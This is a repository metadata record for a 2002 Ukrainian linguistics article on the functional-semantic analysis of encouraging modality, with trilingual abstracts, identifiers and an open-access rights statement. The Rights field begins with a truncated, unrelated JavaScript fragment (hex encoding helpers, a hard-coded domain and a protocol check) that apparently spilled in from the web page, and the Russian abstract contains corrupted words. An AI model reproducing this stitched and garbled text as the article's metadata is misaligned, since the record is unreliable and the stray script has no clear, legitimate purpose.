Record Details

FUNCTIONAL-SEMANTIC ANALYSIS OF ENCOURAGING MODALITY

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title FUNCTIONAL-SEMANTIC ANALYSIS OF ENCOURAGING MODALITY
Функционально-семантический анализ побудительной модальности
ФУНКЦІОНАЛЬНО-СЕМАНТИЧНИЙ АНАЛІЗ СПОНУКАЛЬНОЇ МОДАЛЬНОСТІ
 
Creator Харченко, C. B.; Національний авіаційний університет
 
Subject

811.161.2'367


811.161.2'367


811.161.2'367
 
Description It is devoted to the coverage of issues related to the functional-semantic analysis of the category of motivational modality. It is shown that the qualification and classification of invariants of speech realization of the motivational meaning, which is allocated within the objective modal values, should be carried out taking into account verbal and nonverbal factors. Orientation of motivation for a positive result presupposes both obligatory consideration of known or presumed background knowledge, social and communicative status of communicators, speech situation.
Посвящено освещению вопросов, "связанных с функционально-семантическим анализом категории побудительной модальности. Показано, что квалификацию и классификацию инвариантов речевой реализации побудительного значения, которое выделяется в пределах объективного модальных значений, следует осуществлять с учетом вербальных и невербальных факторов. Ориентированность побуждения на положительный результат предусматривает оба язкове учета известных или предполагаемых фоновых знаний, социального и коммуникативного статуса коммуникантов, ситуации речи.
Присвячено висвітленню питань, пов 'язаних з функціонально-семантичним аналізом категорії спонукальної модальності. Показано, що кваліфікацію і класифікацію інваріантів мовленнєвої реалізації спонукального значення, яке виділяється в межах об ’єктивних модальних значень, слід здійснювати з урахуванням вербальних і невербальних чинників. Орієнтованість спонукання на позитивний результат передбачає обоє язкове врахування відомих або передбачуваних фонових знань, соціального та комунікативного статусу комунікантів, ситуації мовлення.
 
Publisher National Aviation University
 
Contributor


 
Date 2021-03-15
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/15244
10.18372/2306-1472.14.15244
 
Source Proceedings of the National Aviation University; Том 14, № 3 (2002); 254-259
Вестник Национального авиационного университета; Том 14, № 3 (2002); 254-259
Вісник Національного Авіаційного Університету; Том 14, № 3 (2002); 254-259
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ